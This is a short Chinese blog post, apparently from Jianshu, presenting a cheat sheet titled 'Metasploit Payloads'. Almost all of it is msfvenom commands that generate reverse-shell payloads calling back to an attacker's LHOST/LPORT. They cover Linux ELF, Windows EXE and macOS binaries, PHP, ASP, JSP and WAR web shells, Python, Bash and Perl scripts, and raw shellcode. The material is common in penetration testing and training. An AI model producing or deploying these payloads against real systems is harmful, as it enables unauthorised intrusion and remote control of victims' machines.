美文网首页
Metasploit Payloads

Metasploit Payloads

作者: migrate_ | 来源:发表于2019-12-04 10:20 被阅读0次

    List payloads

    msfvenom -l
    

    Binaries

    Linux

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f elf > shell.elf
    

    Windows

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f exe > shell.exe
    

    Mac

    msfvenom -p osx/x86/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f macho > shell.macho
    

    Web Payloads

    PHP

    msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<Port> -f raw > shell.php
    

    ASP

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f asp > shell.asp
    

    JSP

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f raw > shell.jsp
    

    WAR

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f war > shell.war
    

    Scripting Payloads

    Python

    msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<Port> -f raw > shell.py
    

    Bash

    msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<Port> -f raw > shell.sh
    

    Perl

    msfvenom -p cmd/unix/reverse_perl LHOST=<IP> LPORT=<Port> -f raw > shell.pl
    

    Shellcode

    Linux Based Shellcode

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f <language>
    

    Windows Based Shellcode

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f <language>
    

    Mac Based Shellcode

    msfvenom -p osx/x86/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f <language>
    

    相关文章

      网友评论

          本文标题:Metasploit Payloads

          本文链接:https://www.haomeiwen.com/subject/hmukgctx.html